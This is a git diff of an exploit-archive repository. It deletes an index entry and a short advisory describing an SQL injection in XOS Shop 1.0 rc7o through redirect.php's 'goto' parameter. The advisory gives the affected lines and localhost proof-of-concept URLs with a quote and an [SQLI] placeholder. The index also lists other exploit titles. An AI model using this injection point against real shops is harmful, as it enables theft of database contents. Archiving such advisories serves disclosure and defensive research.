diff --git a/files.csv b/files.csv index 2b5a75589..db1bbe2b6 100755 --- a/files.csv +++ b/files.csv @@ -27994,7 +27994,6 @@ id,file,description,date,author,platform,type,port 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0 31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0 -31171,platforms/php/webapps/31171.txt,"XOS Shop 1.0 rc7o (redirect.php, goto param) - SQL Injection Vulnerability",2014-01-24,"JoKeR DZ",php,webapps,80 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php, id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 diff --git a/platforms/php/webapps/31171.txt b/platforms/php/webapps/31171.txt deleted file mode 100755 index 46dafe035..000000000 --- a/platforms/php/webapps/31171.txt +++ /dev/null @@ -1,43 +0,0 @@ -################################################################################ -# Exploit Title: XOS Shop_v1.0_rc7o Sql Injection Vulnerability -# Date: 23/01/2014 -# Exploit Author: JoKeR_StEx -# Vendor Homepage: http://www.xos-shop.com/ -# Software Link: http://xos-shop.com/main/index.php/cPath/25/ -# Version: v1.0 rc7o -# Tested on: Windows PHP Version 6.0.0-dev -# CVE : [~] -################################################################################## - -[-] Description : - - XOS Shop is affected by Sql Injection Vulnerability - The Attacker Can inject some MYSQl and exploit it(get content of db) - -[+] VUlnerability : - -Affected File ==> redirect.php -Line 47;53 - - - [-]Exploit - - http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto=' -http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto=[SQLI] - -################################################################################### -# Gr33ting's : Asesino04 , Shield Dz , Drr.0ryx & All My Friedns -################################################################################### -eamil : jokerdz44@yahoo.fr -Facebook : fb.me/imadlilong.lasvegas -Twitter : @JoKeR_StEx